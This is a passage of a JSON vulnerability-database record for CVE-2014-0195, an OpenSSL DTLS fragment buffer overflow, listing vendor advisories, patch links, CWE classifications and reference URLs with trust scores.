"ICSA-17-094-04", "trust": 0.4 }, { "db": "DLINK", "id": "SAP10045", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-0195", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127917", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127018", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127807", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127630", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127045", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127086", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126961", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126930", "trust": 0.1 } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-173" }, { "db": "VULMON", "id": "CVE-2014-0195" }, { "db": "BID", "id": "67900" }, { "db": "JVNDB", "id": "JVNDB-2014-002765" }, { "db": "PACKETSTORM", "id": "127917" }, { "db": "PACKETSTORM", "id": "127018" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "127086" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "126930" }, { "db": "NVD", "id": "CVE-2014-0195" } ] }, "id": "VAR-201406-0137", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.40652013894736844 }, "last_update_date": "2024-07-23T21:11:52.075000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "DTLS invalid fragment vulnerability (CVE-2014-0195)", "trust": 1.5, "url": "http://www.openssl.org/news/secadv_20140605.txt" }, { "title": "HT6443", "trust": 0.8, "url": "http://support.apple.com/kb/ht6443" }, { "title": "HT6443", "trust": 0.8, "url": "http://support.apple.com/kb/ht6443?viewlocale=ja_jp" }, { "title": "KB36051", "trust": 0.8, "url": "http://www.blackberry.com/btsc/kb36051" }, { "title": "cisco-sa-20140605-openssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl" }, { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://fedoraproject.org/ja/" }, { "title": "Multiple Vulnerabilities in OpenSSL", "trust": 0.8, "url": "http://www.fortiguard.com/advisory/fg-ir-14-018/" }, { "title": "HIRT-PUB14010", "trust": 0.8, "url": "http://www.hitachi.co.jp/hirt/publications/hirt-pub14010/index.html" }, { "title": "HPSBHF03293 SSRT101846", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04595951" }, { "title": "Once Bled, Twice Shy (OpenSSL: CVE-2014-0195)", "trust": 0.8, "url": "http://h30499.www3.hp.com/t5/hp-security-research-blog/once-bled-twice-shy-openssl-cve-2014-0195/ba-p/6501048#.u5ulr1scgdu" }, { "title": "ZDI-14-173/CVE-2014-0195 - OpenSSL DTLS Fragment Out-of-Bounds Write: Breaking up is hard to do", "trust": 0.8, "url": "http://h30499.www3.hp.com/t5/hp-security-research-blog/zdi-14-173-cve-2014-0195-openssl-dtls-fragment-out-of-bounds/ba-p/6501002#.u5ulsvscgdu" }, { "title": "1673137", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137" }, { "title": "1676035", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035" }, { "title": "1676062", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062" }, { "title": "1676419", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419" }, { "title": "1677695", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695" }, { "title": "1677828", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828" }, { "title": "1676128", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676128" }, { "title": "1678167", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678167" }, { "title": "00001841", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001841" }, { "title": "1678289", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678289" }, { "title": "00001843", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001843" }, { "title": "2079783", "trust": 0.8, "url": "http://kb.vmware.com/selfservice/microsites/search.do?language=en_us\u0026cmd=displaykc\u0026externalid=2079783" }, { "title": "SB10075", "trust": 0.8, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075" }, { "title": "Fix for CVE-2014-0195", "trust": 0.8, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=1632ef744872edc2aa2a53d487d3e79c965a4ad3" }, { "title": "Oracle Critical Patch Update Advisory - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "title": "Text Form of Oracle Critical Patch Update - January 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015verbose-1972976.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2014", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2014 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014verbose-1972958.html" }, { "title": "Bug 1103598", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1103598" }, { "title": "SA80", "trust": 0.8, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa80" }, { "title": "Huawei-SA-20140613-OpenSSL", "trust": 0.8, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm" }, { "title": "SOL15356: OpenSSL vulnerability CVE-2014-0195", "trust": 0.8, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15356.html" }, { "title": "January 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/january_2015_critical_patch_update" }, { "title": "CVE-2014-0195 Buffer Errors vulnerability in OpenSSL", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_0195_buffer_errors" }, { "title": "VMSA-2014-0012", "trust": 0.8, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html" }, { "title": "OpenSSL\u306e\u8106\u5f31\u6027(CVE-2014-0224\u4ed6)\u306b\u3088\u308b\u30c6\u30fc\u30d7\u30e9\u30a4\u30d6\u30e9\u30ea\u88c5\u7f6e\u3078\u306e\u5f71\u97ff\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/openssl_cve20140224_tape_library.html" }, { "title": "cisco-sa-20140605-openssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1122/1122700_cisco-sa-20140605-openssl-j.html" }, { "title": "Symfoware Server: OpenSSL\u306e\u8106\u5f31\u6027(CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-3470)(2014\u5e747\u670815\u65e5)", "trust": 0.8, "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/symfoware_201404.html" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/07/25/how_long_is_too_long_to_wait_for_a_security_update/" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/06/06/thanks_for_nothing_openssl_cries_stonewalled_de_raadt/" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/06/05/openssl_bug_batch/" }, { "title": "Red Hat: CVE-2014-0195", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0195" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-3" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-4" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-2" }, { "title": "Debian Security Advisories: DSA-2950-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=909292f2afe623fbec51f7ab6b32f790" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=07d14df4883f21063a053cea8d2239c6" }, { "title": "Amazon Linux AMI: ALAS-2014-349", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-349" }, { "title": "Symantec Security Advisories: SA80 : OpenSSL Security Advisory 05-Jun-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=dd4667746d163d08265dfdd4c98e4201" }, { "title": "Debian CVElist Bug Report Logs: virtualbox: CVE-2014-6588 CVE-2014-6589 CVE-2014-6590 CVE-2014-6595 CVE-2015-0418 CVE-2015-0427", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=eee4d8c3e2b11de5b15ee65d96af6c60" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for OpenSSL Vulnerabilities (June 2014)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=afbd3a710e98424e558b1b21482abad6" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "CVE-2014-0195", "trust": 0.1, "url": "https://github.com/ricedu/cve-2014-0195 " }, { "title": "changelog", "trust": 0.1, "url": "https://github.com/securityrouter/changelog " }, { "title": "changelog", "trust": 0.1, "url": "https://github.com/halon/changelog " }, { "title": "", "trust": 0.1, "url": "https://github.com/potterxma/linux-deployment-standard " }, { "title": "", "trust": 0.1, "url": "https://github.com/sf4bin/seeker_dataset " }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "ZDI", "id": "ZDI-14-173" }, { "db": "VULMON", "id": "CVE-2014-0195" }, { "db": "JVNDB", "id": "JVNDB-2014-002765" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-120", "trust": 1.0 }, { "problemtype": "CWE-119", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002765" }, { "db": "NVD", "id": "CVE-2014-0195" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.5, "url": "http://www.openssl.org/news/secadv_20140605.txt" }, { "trust": 1.4, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa80" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695" }, { "trust": 1.4, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15356.html" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062" }, { "trust": 1.4, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678167" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137" }, { "trust": 1.4, "url": "http://www.fortiguard.com/advisory/fg-ir-14-018/" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095757" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095756" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095755" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095754" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683332" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676879" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676644" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676071" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675821" }, { "trust": 1.4, "url": "http://www.f-secure.com/en/web/labs_global/fsc-2014-6" }, { "trust": 1.4, "url": "http://support.citrix.com/article/ctx140876" }, { "trust": 1.4, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory9.asc" }, { "trust": 1.2, "url": "http://security.gentoo.org/glsa/glsa-201407-05.xml" }, { "trust": 1.1, "url": "http://h30499.www3.hp.com/t5/hp-security-research-blog/once-bled-twice-shy-openssl-cve-2014-0195/ba-p/6501048" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1103598" }, { "trust": 1.1, "url": "http://h30499.www3.hp.com/t5/hp-security-research-blog/zdi-14-173-cve-2014-0195-openssl-dtls-fragment-out-of-bounds/ba-p/6501002" }, { "trust": 1.1, "url": "http://www.blackberry.com/btsc/kb36051" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59301" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59450" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59491" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59721" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59655" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59659" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678289" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59162" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59528" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58939" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59666" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59587" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59126" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59490" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59514" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677527" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59669" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59413" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58883" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59300" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59895" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59530" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59342" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59451" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001843" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58743" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001841" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59990" }, { "trust": 1.1, "url": "http://secunia.com/advisories/60571" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59784" }, { "trust": 1.1, "url": "http://support.apple.com/kb/ht6443" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2014/dec/23" }, { "trust": 1.1, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142660345230545\u0026w=2" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140431828824371\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140499827729550\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140266410314613\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140448122410568\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140491231331543\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140621259019789\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140482916501310\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140389274407904\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140317760000786\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140904544427729\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140389355508263\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140752315422991\u0026w=2" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05301946" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00016.html" }, { "trust": 1.1, "url": "https://www.novell.com/support/kb/doc.php?id=7015271" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 1.1, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0006.html" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1030337" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/67900" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:106" }, { "trust": 1.1, "url": "http://www.ibm.com/support/docview.wss?uid=swg24037783" }, { "trust": 1.1, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676793" }, { "trust": 1.1, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 1.1, "url": "http://secunia.com/advisories/61254" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59518" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59454" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59449" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59441" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59437" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59429" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59365" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59364" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59310" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59306" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59305" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59287" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59223" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59192" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59189" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59188" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59175" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59040" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58977" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58945" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58714" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58713" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58660" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58615" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58337" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "trust": 1.1, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=1632ef744872edc2aa2a53d487d3e79c965a4ad3" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0195" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu93868849/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0195" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.3, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10045" }, { "trust": 0.3, "url": "http://www.cerberusftp.com/products/releasenotes.html" }, { "trust": 0.3, "url": "http://googlechromereleases.blogspot.com/2014/06/chrome-for-android-update.html" }, { "trust": 0.3, "url": "http://blogs.citrix.com/2014/06/06/citrix-security-advisory-for-openssl-vulnerabilities-june-2014/" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_0195_buffer_errors" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2014/aug/att-93/esa-2014-079.txt" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678123" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181245" }, { "trust": 0.3, "url": "http://www8.hp.com/us/en/software-solutions/operations-analytics-operations-analysis/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21685551" }, { "trust": 0.3, "url": "http://www.marshut.com/ixwnpv/stunnel-5-02-released.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181099" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/mar/84" }, { "trust": 0.3, "url": "http://btsc.webapps.blackberry.com/btsc/viewdocument.do;jsessionid=98ec479ee69ccb916d2ea4b09943faf5?nocount=true\u0026externalid=kb36051\u0026sliceid=1\u0026cmd=\u0026forward=nonthreadedkc\u0026command=show\u0026kcid=kb36051\u0026viewe" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04355095" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04343424" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04345210" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349175" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349789" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04349897" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04363613" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04368523" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04378799" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04379485" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04337774" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05301946" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04336637" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678356" }, { "trust": 0.3, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095940" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676673" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676041" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676128" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-14-173/" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020200" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 0.3, "url": "https://rhn.redhat.com/errata/rhsa-2014-0625.html" }, { "trust": 0.3, "url": "http://forums.alienvault.com/discussion/3054/security-advisory-alienvault-v4-10-0-addresses-several-vulnerabilities" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-345106.htm" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676793" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021009" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676840" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=nas8n1020163" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678104" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682023" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682025" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682024" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678289" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004695" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020976" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1020952" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1007987" }, { "trust": 0.3, "url": "http://www.ubuntu.com/usn/usn-2232-4/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0224" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3470" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/120.html" }, { "trust": 0.1, "url": 